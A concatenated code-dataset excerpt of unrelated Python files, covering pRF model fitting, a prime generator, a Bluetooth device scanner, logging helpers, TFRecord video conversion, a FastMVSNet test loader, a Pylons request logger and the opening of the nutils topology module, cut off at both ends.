\" +\n str(data_batches[0].shape[0]) + \" voxels.\")\n\n # parallel grid search over (sequential) batches of voxels\n grid_search_rbs = Parallel(self.n_jobs, verbose=11)(\n delayed(rsq_betas_for_batch)(\n data=data,\n vox_nums=vox_nums,\n n_predictions=self.n_predictions,\n n_timepoints=self.n_timepoints,\n data_var=self.data_var,\n sa=self.sa,\n ss=self.ss,\n nb=self.nb,\n sb=self.sb,\n gaussian_params=self.gaussian_params)\n for data, vox_nums in zip(data_batches, split_indices))\n\n grid_search_rbs = np.concatenate(grid_search_rbs, axis=0)\n\n # store results\n max_rsqs = grid_search_rbs[:, 0].astype('int')\n self.gridsearch_r2 = grid_search_rbs[:, 1]\n self.best_fitting_baseline = grid_search_rbs[:, 2]\n self.best_fitting_beta = grid_search_rbs[:, 3]\n\n self.gridsearch_params = np.zeros((self.n_units, 10))\n\n self.gridsearch_params[self.gridsearch_rsq_mask] = np.array([\n self.gaussian_params[self.gridsearch_rsq_mask, 0],\n self.gaussian_params[self.gridsearch_rsq_mask, 1],\n self.gaussian_params[self.gridsearch_rsq_mask, 2],\n self.best_fitting_beta,\n self.best_fitting_baseline,\n self.sa[max_rsqs],\n self.ss[max_rsqs],\n self.nb[max_rsqs] * self.best_fitting_beta,\n self.sb[max_rsqs],\n self.gridsearch_r2\n ]).T\n","sub_path":"mri_analysis/model/prfpy/fit.py","file_name":"fit.py","file_ext":"py","file_size_in_byte":32962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"546315957","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nfrom core import *\n\ntry:\n max=int(sys.argv[1])\nexcept:\n max=int(raw_input(\"Max number(0 for infinity): \"))\ntry:\n filename = sys.argv[2]\nexcept:\n filename = \"primenums.txt\"\nnum = 0\nif os.path.isfile(filename):\n print(\"%s exists!\"%filename)\n file = open(filename, 'r')\n for line in file:\n x = line\n num = int(x.split(\",\")[-2])\n print(\"Starting from %i\" %num)\n file.close()\nelse:\n print(\"Creating %s\"%filename)\n file = open(filename, \"w\")\n file.write(\"\")\n file.close()\nfile = open(filename, \"a\")\nif max > 0:\n while num <= max:\n if is_prime(num):\n print(num)\n file.write(\"%i,\"%num)\n num = num + 1\nelif max == 0:\n while True:\n if is_prime(num):\n print(num)\n file.write(\"%i,\"%num)\n num = num + 1\nfile.close()\n","sub_path":"Math/primeMine.py","file_name":"primeMine.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"653371600","text":"from bluetooth.ble import BeaconService\r\nfrom bluetooth.ble import DiscoveryService\r\nimport bluetooth\r\n\r\nprint('start')\r\n\r\nnearby_devices = bluetooth.discover_devices(lookup_names=True)\r\nprint(\"Found {} devices.\".format(len(nearby_devices)))\r\n\r\nfor addr, name in nearby_devices:\r\n print(\" {} - {}\".format(addr, name))\r\n\r\nprint('start')\r\n\r\nservice = DiscoveryService()\r\ndevices = service.discover(2)\r\n\r\nfor address, name in devices.items():\r\n print(\"name: {}, address: {}\".format(name, address))\r\n\r\nprint('start')\r\n\r\nclass Beacon(object):\r\n \r\n def __init__(self, data, address):\r\n self._uuid = data[0]\r\n self._major = data[1]\r\n self._minor = data[2]\r\n self._power = data[3]\r\n self._rssi = data[4]\r\n self._address = address\r\n \r\n def __str__(self):\r\n ret = \"Beacon: address:{ADDR} uuid:{UUID} major:{MAJOR}\"\\\r\n \" minor:{MINOR} txpower:{POWER} rssi:{RSSI}\"\\\r\n .format(ADDR=self._address, UUID=self._uuid, MAJOR=self._major,\r\n MINOR=self._minor, POWER=self._power, 
RSSI=self._rssi)\r\n return ret\r\n\r\nservice = BeaconService('hci0')\r\ndevices = service.scan(1)\r\n\r\nfor address, data in list(devices.items()):\r\n b = Beacon(data, address)\r\n print(b)\r\n\r\nprint(\"Done.\")","sub_path":"Collin/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"328011620","text":"import logging.handlers\nimport os \n\n\nclass LOG(logging.Logger):\n def __init__(self, filename=None):\n super(LOG, self).__init__(self)\n\n if filename is None:\n filename = 'test.log'\n if not os.path.exists(os.path.join(os.path.split(os.path.realpath(__file__))[0],'logs')):\n os.makedirs(os.path.join(os.path.split(os.path.realpath(__file__))[0],'logs'), 0o700)\n self.filename = os.path.join(os.path.split(os.path.realpath(__file__))[0],'logs',filename)\n\n\n fh = logging.handlers.TimedRotatingFileHandler(self.filename, 'D', 1, 30)\n fh.suffix = \"%Y%m%d-%H%M.log\"\n fh.setLevel(logging.DEBUG) \n\n\n ch = logging.StreamHandler() \n ch.setLevel(logging.DEBUG) \n\n\n formatter = logging.Formatter(\"[%(asctime)s] [%(levelname)8s] %(message)s\")\n fh.setFormatter(formatter) \n ch.setFormatter(formatter) \n\n\n self.addHandler(fh) \n self.addHandler(ch) \n\nif __name__ == '__main__':\n pass\n","sub_path":"测试api/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"435971877","text":"from __future__ import absolute_import, division, print_function\n\nimport os, random\nimport tensorflow as tf\nimport numpy as np\nimport glob\nfrom skimage import io, color, transform, img_as_ubyte\nimport skvideo.io\nimport random\nimport threading\nfrom datetime import datetime\nimport sys\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('train_list',\n '/home/zyq/moment_in_time/train_list.txt',\n 'Traing video directory')\ntf.app.flags.DEFINE_string('val_list',\n '/home/zyq/moment_in_time/validation_list.txt',\n 'Validation video directory')\n\ntf.app.flags.DEFINE_string('output_dir',\n '/home/zyq/moment_in_time/dataset/',\n 'Output directory')\n\ntf.app.flags.DEFINE_integer('train_shards', 1024,\n 'Number of shards in training TFRecord files.')\ntf.app.flags.DEFINE_integer('val_shards', 128,\n 'Number of shards in training TFRecord files.')\n\ntf.flags.DEFINE_integer('num_threads', 16,\n 'Numbers of threads to preprocess the videos.')\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef _int64_feature_list(values):\n return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])\n\n\ndef _bytes_feature_list(values):\n return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])\n\ndef get_label(label_file):\n dict = {}\n with open(label_file) as f:\n lines = f.readlines()\n for line in lines:\n class_name = line.split(',')[0]\n class_num = line.split(',')[1]\n dict[class_name] = class_num\n return dict\n\ndef get_video_frames(video_path):\n videogen = skvideo.io.vreader(video_path)\n frames = np.asarray([frame for frame in videogen])\n return frames\n\ndef _to_sequence_example(video, dict, num_frame=64):\n '''Build a SequenceExample proto for an video-label 
pair.\n    Args:\n        video_path: Path of the video data.\n        label_path: Path of the label data.\n        vocab: A Vocabulary object.\n    Returns:\n        A SequenceExample proto.\n    '''\n\n    video_path = video.split(' ')[0]\n    video_frames = int(video.split(' ')[1])\n    label = int(video.split(' ')[2])\n    confidence = int(video.split(' ')[3][0])\n    frame_list = glob.glob(os.path.join(video_path, '*img*'))\n    flow_x_list = glob.glob(os.path.join(video_path, '*flow_x*'))\n    flow_y_list = glob.glob(os.path.join(video_path, '*flow_y*'))\n    if len(frame_list) < num_frame or len(flow_x_list) < num_frame or len(flow_y_list) < num_frame:\n        raise ValueError('{} frames not enough!'.format(video_path))\n    assert len(frame_list) == len(flow_x_list)\n    assert len(flow_x_list) == len(flow_y_list)\n\n    start = random.randrange(1, 1 + len(frame_list) - num_frame)\n    frames = []\n    flow_xs = []\n    flow_ys = []\n    for i in range(num_frame):\n        frame = video_path + '/img_' + str(i + start).zfill(5) + '.jpg'\n        flow_x = video_path + '/flow_x_' + str(i + start).zfill(5) + '.jpg'\n        flow_y = video_path + '/flow_y_' + str(i + start).zfill(5) + '.jpg'\n        frames.append(io.imread(frame))\n        flow_xs.append(io.imread(flow_x))\n        flow_ys.append(io.imread(flow_y))\n\n    frames_byte = [frame.tostring() for frame in frames]\n    flow_xs_byte = [frame.tostring() for frame in flow_xs]\n    flow_ys_byte = [frame.tostring() for frame in flow_ys]\n\n    example = tf.train.SequenceExample(\n        context=tf.train.Features(feature={\n            "class": _int64_feature(label),\n            "confidence": _int64_feature(confidence)\n        }),\n        feature_lists=tf.train.FeatureLists(feature_list={\n            "frames": _bytes_feature_list(frames_byte),\n            "flow_xs": _bytes_feature_list(flow_xs_byte),\n            "flow_ys": _bytes_feature_list(flow_ys_byte)\n        })\n    )\n    return example\n\n\ndef process_batch_files(thread_index, ranges, name, num_shards, video_list, dict):\n    '''Processes and saves a subset of videos as TFRecord files in one thread.\n    Args:\n        thread_index: index of this worker thread\n        ranges: how the dataset is partitioned across threads, a list of pairs\n        name: Unique identifier specifying the dataset\n        video_list: list of video description lines to process\n        dict: optional class-name-to-id mapping\n        num_shards: number of TFRecord files the dataset is finally split into\n    '''\n    num_threads = len(ranges)\n    assert not num_shards % num_threads\n    num_shards_per_batch = int(num_shards / num_threads)\n\n    shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],\n                               num_shards_per_batch + 1).astype(int)\n    num_video_in_thread = ranges[thread_index][1] - ranges[thread_index][0]\n\n    counter = 0\n    for s in range(num_shards_per_batch):\n        shard = thread_index * num_shards_per_batch + s\n        output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)\n        output_file = os.path.join(FLAGS.output_dir, output_filename)\n        writer = tf.python_io.TFRecordWriter(output_file)\n\n        shard_counter = 0\n        video_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)\n        for i in video_in_shard:\n            video = video_list[i]\n            sequence_example = _to_sequence_example(video, dict)\n            if sequence_example is not None:\n                writer.write(sequence_example.SerializeToString())\n                shard_counter += 1\n                counter += 1\n\n            if not counter % 1000:\n                print("%s [thread %d]: Processed %d of %d items in thread batch." %\n                      (datetime.now(), thread_index, counter, num_video_in_thread))\n                sys.stdout.flush()\n\n        writer.close()\n        print("%s [thread %d]: Wrote %d video-label pairs to %s" %\n              (datetime.now(), thread_index, shard_counter, output_file))\n        sys.stdout.flush()\n        shard_counter = 0\n    print("%s [thread %d]: Wrote %d video-label pairs to %d shards." %\n          (datetime.now(), thread_index, counter, num_shards_per_batch))\n    sys.stdout.flush()\n\n
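# Sanity check on the sharding arithmetic above: with the default flags
# (train_shards=1024, num_threads=16) each thread writes 1024/16 = 64 shard
# files, and the assert in process_batch_files guarantees the division is exact.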
def process_dataset(name, dataset_list, num_shards, dict):\n    '''Process a complete data set and save it as TFRecord files.\n    Args:\n        name: name of the data set.\n        dataset_list: text file listing the videos of the data set.\n        num_shards: number of TFRecord files to produce.\n        dict: optional class-name-to-id mapping.\n    '''\n\n    f = open(dataset_list, 'r')\n    video_list = f.readlines()\n    f.close()\n    random.seed(1117)\n    random.shuffle(video_list)\n\n    num_threads = min(num_shards, FLAGS.num_threads)\n    spacing = np.linspace(0, len(video_list), num_threads + 1).astype(int)\n    ranges = []\n    threads = []\n    for i in range(len(spacing) - 1):\n        ranges.append([spacing[i], spacing[i + 1]])\n\n    coord = tf.train.Coordinator()\n\n    print('Launching %d threads for spacing: %s' % (num_threads, ranges))\n    for thread_index in range(len(ranges)):\n        args = (thread_index, ranges, name, num_shards, video_list, dict)\n        t = threading.Thread(target=process_batch_files, args=args)\n        t.start()\n        threads.append(t)\n\n    coord.join(threads)\n    print('%s: Finished processing all %d video-label pairs in data set "%s".' %\n          (datetime.now(), len(video_list), name))\n\n\ndef main(unused_argv):\n    def _is_valid_num_shards(num_shards):\n        """Returns True if num_shards is compatible with FLAGS.num_threads."""\n        return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads\n\n    assert _is_valid_num_shards(FLAGS.train_shards), (\n        '''Please make the FLAGS.num_threads commensurate with FLAGS.train_shards''')\n\n    assert _is_valid_num_shards(FLAGS.val_shards), (\n        "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")\n\n    # dict = get_label(FLAGS.label_file)\n    dict = None\n    process_dataset('train', FLAGS.train_list, FLAGS.train_shards, dict)\n    process_dataset('val', FLAGS.val_list, FLAGS.val_shards, dict)\n\n\nif __name__ == '__main__':\n    tf.app.run()","sub_path":"data_process/to_tfrecord.py","file_name":"to_tfrecord.py","file_ext":"py","file_size_in_byte":8383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"54769540","text":"import cv2\nimport torch\nimport os\n\nfrom torch import nn\nimport numpy as np\nimport fastmvsnet.utils.io as io\nfrom fastmvsnet.model import build_pointmvsnet as build_model, FastMVSNet\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass testDataset(Dataset):\n    # mean = torch.tensor([1.97145182, -1.52387525, 651.07223895])\n    # std = torch.tensor([84.45612252, 93.22252387, 80.08551226])\n\n    def __init__(self, height, width, rootdir, num_view, interval_scale=None, num_virtual_plane=None):\n        self.rootdir = rootdir\n        self.num_view = num_view\n        self.interval_scale = interval_scale\n        self.num_virtual_plane = num_virtual_plane\n        self.pathlist = self._load_dataset(num_view)\n\n        self.height = height\n        self.width = width\n\n    def __getitem__(self, index):\n        path = self.pathlist[index]\n        images = []\n        cams = []\n        for view in range(self.num_view):\n            try:\n                image = cv2.imread(path["image_file"][view])\n                cam = io.load_cam_dtu(open(path["cam_file"][view]),\n                                      self.num_virtual_plane, self.interval_scale)\n                images.append(image)\n                cams.append(cam)\n            except:\n                print(path["image_file"][view] + " Wrong")\n        img_list = np.stack(images, axis=0)\n        cams_list = np.stack(cams, axis=0)\n        img_list = torch.tensor(img_list).permute(0, 3, 1, 2).float()\n        cams_list = torch.tensor(cams_list).float()\n        return {\n            "images": img_list,\n            "cams": cams_list\n        }\n\n    def __len__(self):\n        return len(self.pathlist)  # only 1 (the experiment uses a single group, under the same lighting conditions)\n\n
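    # _load_dataset below assumes a DTU-style folder layout (Rectified/, Cameras/,
    # Depths/) under rootdir and builds a single sample entry, matching __len__
    # above; the "{:02d}.jpg" naming is kept from the original code.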
    def _load_dataset(self, num_view):\n        pathlist = []\n        path = {}\n        image_file = []\n        cam_file = []\n        depth_file = []\n        image_folder = self.rootdir + "/Rectified/"\n        cam_folder = self.rootdir + "/Cameras/"\n        depth_folder = self.rootdir + "/Depths/"\n        for viewnum in range(num_view):\n            image_file.append(image_folder + "/{:02d}.jpg".format(viewnum))\n            cam_file.append(cam_folder + "/{:02d}.jpg".format(viewnum))\n            depth_file.append(depth_folder + "/{:02d}.jpg".format(viewnum))\n\n        path["image_file"] = image_file\n        path["cam_file"] = cam_file\n        path["depth_file"] = depth_file\n        pathlist.append(path)\n\n        return pathlist\n\n\n\nif __name__ == "__main__":\n    root_path = r"E:\dataset\dtu-test-1200\myutest"\n    # height/width/num_view below are placeholders; adjust them to the actual test scan\n    dataset = testDataset(height=512, width=640, rootdir=root_path, num_view=5)\n    net = FastMVSNet(\n        img_base_channels=8,\n        vol_base_channels=8,\n        flow_channels=8,\n    )\n    model = nn.DataParallel(net).cuda()\n    model.load_state_dict(torch.load(r"D:\srccode\FastMVSNet\outputs\pretrained.pth"))\n    with torch.no_grad():\n        for i, data in enumerate(dataset):\n            data = {k: v.cuda(non_blocking=True) if isinstance(v, torch.Tensor) else v for k, v in data.items()}\n            preds = model(data, 1, inter_scales=4.24, isGN=True, isTest=True)\n            init_depth_map = preds["coarse_depth_map"].cpu().numpy()[0, 0]\n            init_prob_map = preds["coarse_prob_map"].cpu().numpy()[0, 0]\n            io.write_pfm("./init_depth_map.pfm", init_depth_map)\n            io.write_pfm("./init_prob_map.pfm", init_prob_map)\n            interval_list = np.array([-2.0, -1.0, 0.0, 1.0, 2.0])\n            interval_list = np.reshape(interval_list, [1, 1, -1])\n            for i, k in enumerate(preds.keys()):\n                if "flow" in k:\n                    if "prob" in k:\n                        out_flow_prob_map = preds[k][0].cpu().permute(1, 2, 0).numpy()\n                        num_interval = out_flow_prob_map.shape[-1]\n                        assert num_interval == interval_list.size\n                        pred_interval = np.sum(out_flow_prob_map * interval_list, axis=-1) + 2.0\n                        pred_floor = np.floor(pred_interval).astype(np.int)[..., np.newaxis]\n                        pred_ceil = pred_floor + 1\n                        pred_ceil = np.clip(pred_ceil, 0, num_interval - 1)\n                        pred_floor = np.clip(pred_floor, 0, num_interval - 1)\n                        prob_height, prob_width = pred_floor.shape[:2]\n                        prob_height_ind = np.tile(np.reshape(np.arange(prob_height), [-1, 1, 1]), [1, prob_width, 1])\n                        prob_width_ind = np.tile(np.reshape(np.arange(prob_width), [1, -1, 1]), [prob_height, 1, 1])\n\n                        floor_prob = np.squeeze(out_flow_prob_map[prob_height_ind, prob_width_ind, pred_floor], -1)\n                        ceil_prob = np.squeeze(out_flow_prob_map[prob_height_ind, prob_width_ind, pred_ceil], -1)\n                        flow_prob = floor_prob + ceil_prob\n                        io.write_pfm("./flow_prob.pfm",flow_prob)","sub_path":"fastmvsnet/utils/testDataset.py","file_name":"testDataset.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"610968613","text":"import numpy\nimport os\nimport datetime\nimport numpy as np\nimport pickle\n\n\ndef prep_pred_file(params):\n    f_dir = params["wd"] + "/pred/"\n    if not os.path.exists(f_dir):\n        os.makedirs(f_dir)\n    f_dir = params["wd"] + "/pred/" + params["model"]\n    if not os.path.exists(f_dir):\n        os.makedirs(f_dir)\n    # a bare map() would be lazy under Python 3, so delete the old files explicitly\n    for f in os.listdir(f_dir):\n        os.unlink(os.path.join(f_dir, f))\n\ndef write_pred(est, bindex, G_list, params):\n    batch_size = est.shape[0]\n    seq_length = est.shape[1]\n    s_index = params["batch_size"] * bindex * seq_length\n    f_dir = params["wd"] + "/pred/" + params["model"] + "/"\n    for b in range(batch_size):\n        for s in range(seq_length):\n            diff_vec = est[b][s] * 2\n            vec_str = ' '.join(['%.6f' % num for num in diff_vec])\n            p_file = f_dir + os.path.basename(G_list[s_index])\n            with open(p_file,
\"a\") as p:\n p.write(vec_str)\n s_index+=1\n\n\ndef get_loss_tf(gt,est):\n batch_seq=gt.shape[0]\n loss=0\n for b in range(batch_seq):\n diff_vec=np.abs(gt[b].reshape(14,3) - est[b].reshape(14,3))*2 #13*3\n sq_m=np.sqrt(np.sum(diff_vec**2,axis=1))\n loss +=np.nanmean(sq_m)\n loss/=(batch_seq)\n return (loss)\n\ndef get_loss(gt,est):\n batch_size=gt.shape[0]\n seq_length=gt.shape[1]\n loss=0\n for b in range(batch_size):\n for s in range(seq_length):\n diff_vec=np.abs(gt[b][s].reshape(14,3) - est[b][s].reshape(14,3))*2 #13*3\n sq_m=np.sqrt(np.sum(diff_vec**2,axis=1))\n loss +=np.nanmean(sq_m)\n loss/=(seq_length*batch_size)\n return (loss)\n\ndef get_loss_bb(gt,est):\n sf=\"/home/coskun/PycharmProjects/RNNPose21/daya/blanket.txt\"\n batch_size=gt.shape[0]\n seq_length=gt.shape[1]\n loss=0\n loss_list=[]\n seq_list=[]\n b_seq_list=[]\n with open(sf,\"a\") as f_handle:\n for b in range(batch_size):\n seq_los=[0]*seq_length\n for s in range(seq_length):\n diff_vec=np.abs(gt[b][s].reshape(14,3) - est[b][s].reshape(14,3))*2 #14,3\n val=np.sqrt(np.sum(diff_vec**2,axis=1))\n for i in range(14):\n f=val[i]\n f_handle.write(\"%f\"%(f))\n if(i<13):\n f_handle.write(\";\")\n f_handle.write('\\n')\n b_l=np.nanmean(np.sqrt(np.sum(diff_vec**2,axis=1)))\n loss_list.append(b_l)\n seq_los[s]=b_l\n loss +=np.nanmean(np.sqrt(np.sum(diff_vec**2,axis=1)))\n b_seq_list.append(seq_los)\n seq_list=np.mean(b_seq_list,axis=0)\n loss/=(seq_length*batch_size)\n return (loss,loss_list,seq_list)\n\n\ndef start_log(params):\n log_file=params[\"log_file\"]\n create_file(log_file)\n\n ds= get_time()\n\n log_write(\"Run Id: %s\"%(params['rn_id']),params)\n log_write(\"Deployment notes: %s\"%(params['notes']),params)\n log_write(\"Running mode: %s\"%(params['run_mode']),params)\n log_write(\"Running model: %s\"%(params['model']),params)\n log_write(\"Batch size: %s\"%(params['batch_size']),params)\n log_write(\"Sequence size: %s\"%(params['seq_length']),params)\n\n log_write(\"Starting Time:%s\"%(ds),params)\n log_write(\"size of training data:%f\"%(params[\"len_train\"]),params)\n log_write(\"size of test data:%f\"%(params[\"len_test\"]),params)\n\ndef get_time():\n return str(datetime.datetime.now().time()).replace(\":\",\"-\").replace(\".\",\"-\")\n\ndef create_file(log_file):\n log_dir= os.path.dirname(log_file)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n if(os.path.isfile(log_file)):\n with open(log_file, \"w\"):\n pass\n else:\n os.mknod(log_file)\n\ndef log_to_file(str,params):\n with open(params[\"log_file\"], \"a\") as log:\n log.write(str)\n\ndef log_write(str,params):\n print(str)\n ds= get_time()\n str=ds+\" | \"+str+\"\\n\"\n log_to_file(str,params)\n\ndef log_read(mode,params):\n wd=params[\"wd\"]\n filename=params['log_file']\n with open(wd+\"/logs/\"+filename) as file:\n data = file.read()\n lines = data.split(\"\\n\")\n i=0\n list=[]\n for line in lines:\n if mode+\"-->\" in line:\n epoch=0\n error=0.\n sl=line.split(\"|\")\n for s in sl:\n if \"epoch\" in s:\n epoch=int(s.strip().split(\" \")[2])\n if \"error\" in s:\n error=float(s.strip().split(\" \")[1])\n list.append((epoch,error))\n #numpy.array([[epoch,error] for (epoch,error) in list_val])[:,1] #all error\n return list\n\ndef log_read_train(params):\n wd=params[\"wd\"]\n mode=\"TRAIN\"\n filename=params['log_file']\n with open(wd+\"/logs/\"+filename) as file:\n data = file.read()\n lines = data.split(\"\\n\")\n i=0\n\n list=[]\n for line in lines:\n if mode+\"-->\" in line:\n epoch=0\n batch_index=0\n error=0.\n 
sl=line.split(\"|\")\n for s in sl:\n if \"epoch\" in s:\n epoch=int(s.strip().split(\" \")[2])\n if \"error\" in s:\n error=float(s.strip().split(\" \")[1])\n if \"minibatch\" in s:\n batch_index=int(s.strip().split(\" \")[1].split(\"/\")[0])\n list.append((epoch,batch_index,error))\n #numpy.array([[b, c, d] for (b, c, d) in list_val if b==1 ])[:,2] #first epoch all error\n return list","sub_path":"helper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"252856336","text":"\"\"\"Logging functions for Pylons applications.\n\"\"\"\nimport logging\n\nfrom webob import Request, Response\n\n__all__ = [\"TransLogger\", \"no_error_pages\"]\n\nclass TransLogger(object):\n \"\"\"Based on ``paste.translogger`` but more flexible.\n\n WARNING: Not compatible with interactive traceback due to unknown bug.\n Not recommended for use at this time.\n\n Logs requests in a compact format useful for development debugging.\n\n ``app`` is the WSGI application to be wrapped.\n ``logger_name`` is the Python logger to use. Messages will be logged at\n priority INFO.\n ``filter_func`` is a function that takes the WSGI environ and returns\n true if the request should be logged or false if not. The default\n value ``None`` logs all request.\n\n No return value.\n \"\"\"\n def __init__(self, app, logger_name=\"access\", filter_func=None):\n self.app = app\n self.filter_func = filter_func\n self.log_func = logging.getLogger(logger_name).info\n\n def __call__(self, environ, start_response):\n request = Request(environ)\n response = request.get_response(self.app) # Call WSGI application.\n if (not self.filter_func) or self.filter_func(environ):\n status = response.status_int\n url = request.path_info\n if request.query_string:\n url = \"%s?%s\" % (request.path_info, request.query_string)\n else:\n url = request.path_info\n username = environ.get(\"REMOTE_USER\")\n if username:\n user_info = \" (%s)\" % username\n else:\n user_info = \"\"\n format = \"%s %s [%s]%s\"\n self.log_func(format, status, url, request.method, user_info)\n return response(environ, start_response)\n\n\n#### Filter functions for use with TransLogger ####\n\ndef no_error_pages(environ):\n \"\"\"TransLogger filter func to suppress error pages\n\n Return False if routing variable \"controller\" is present and contains the\n value \"error\".\n \"\"\"\n controller = environ[\"wsgiorg.routing_args\"][1].get(\"controller\")\n return controller != \"error\"\n\n","sub_path":"third_party_lib/hazpy/lib/hazpy/pylons/logging_util.py","file_name":"logging_util.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"150687083","text":"import pandas as pd\nfrom ipa.text import Text\n\nfrom ipa.get_questiontype import get_questiontype\n\n\ndef test_questiontypes():\n path_to_train_data = \"c:/users/sande/documents/taglayer/iwt_project/data\" \\\n \"/raw/questions_question_type.csv\"\n df = pd.read_csv(path_to_train_data, engine=\"python\", delimiter=';',\n dtype=str)\n df.columns = ['question', 'question_type']\n\n correct = 0\n for question, question_type in zip(df[\"question\"], df[\"question_type\"]):\n question = Text(question, \"en\")\n question.preprocess()\n predicted_type = get_questiontype(question)\n\n if predicted_type == question_type:\n correct += 1\n else:\n print(question.raw, predicted_type, question_type)\n\n accuracy = correct / 
len(df[\"question\"])\n\n print(\"Accuracy:\", accuracy)\n assert accuracy > 0.99\n\n\ntest_questiontypes()\n","sub_path":"test_qtype.py","file_name":"test_qtype.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433744889","text":"# Copyright (c) 2014 Evalf\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nThe topology module defines the topology objects, notably the\n:class:`StructuredTopology`. Maintaining strict separation of topological and\ngeometrical information, the topology represents a set of elements and their\ninterconnectivity, boundaries, refinements, subtopologies etc, but not their\npositioning in physical space. The dimension of the topology represents the\ndimension of its elements, not that of the the space they are embedded in.\n\nThe primary role of topologies is to form a domain for :mod:`nutils.function`\nobjects, like the geometry function and function bases for analysis, as well as\nprovide tools for their construction. It also offers methods for integration and\nsampling, thus providing a high level interface to operations otherwise written\nout in element loops. For lower level operations topologies can be used as\n:mod:`nutils.element` iterators.\n\"\"\"\n\nfrom . 
import element, function, evaluable, util, parallel, numeric, cache, transform, transformseq, warnings, matrix, types, points, sparse\nfrom .sample import Sample\nfrom .elementseq import References\nfrom .pointsseq import PointsSequence\nimport numpy, functools, collections.abc, itertools, operator, numbers, pathlib, abc, treelog as log\n_ = numpy.newaxis\n\n_identity = lambda x: x\n\nclass Topology(types.Singleton):\n 'topology base class'\n\n __slots__ = 'references', 'transforms', 'opposites', 'ndims'\n __cache__ = 'border_transforms', 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, references:types.strict[References], transforms:transformseq.stricttransforms, opposites:transformseq.stricttransforms):\n assert references.ndims == opposites.fromdims == transforms.fromdims\n assert len(references) == len(transforms) == len(opposites)\n self.references = references\n self.transforms = transforms\n self.opposites = opposites\n self.ndims = transforms.fromdims\n super().__init__()\n\n def __str__(self):\n 'string representation'\n\n return '{}(#{})'.format(self.__class__.__name__, len(self))\n\n def __len__(self):\n return len(self.references)\n\n def getitem(self, item):\n return EmptyTopology(self.ndims)\n\n def __getitem__(self, item):\n if numeric.isintarray(item):\n item = types.frozenarray(item)\n return Topology(self.references[item], self.transforms[item], self.opposites[item])\n if not isinstance(item, tuple):\n item = item,\n if all(it in (...,slice(None)) for it in item):\n return self\n topo = self.getitem(item) if len(item) != 1 or not isinstance(item[0],str) \\\n else functools.reduce(operator.or_, map(self.getitem, item[0].split(',')), EmptyTopology(self.ndims))\n if not topo:\n raise KeyError(item)\n return topo\n\n def __invert__(self):\n return OppositeTopology(self)\n\n def __or__(self, other):\n assert isinstance(other, Topology) and other.ndims == self.ndims\n return other if not self \\\n else self if not other \\\n else NotImplemented if isinstance(other, UnionTopology) \\\n else UnionTopology((self,other))\n\n __ror__ = lambda self, other: self.__or__(other)\n\n def __and__(self, other):\n keep_self = numpy.array(list(map(other.transforms.contains_with_tail, self.transforms)), dtype=bool)\n if keep_self.all():\n return self\n keep_other = numpy.array(list(map(self.transforms.contains_with_tail, other.transforms)), dtype=bool)\n if keep_other.all():\n return other\n ind_self = types.frozenarray(keep_self.nonzero()[0], copy=False)\n ind_other = types.frozenarray([i for i, trans in enumerate(other.transforms) if keep_other[i] and not self.transforms.contains(trans)], dtype=int)\n # The last condition is to avoid duplicate elements. 
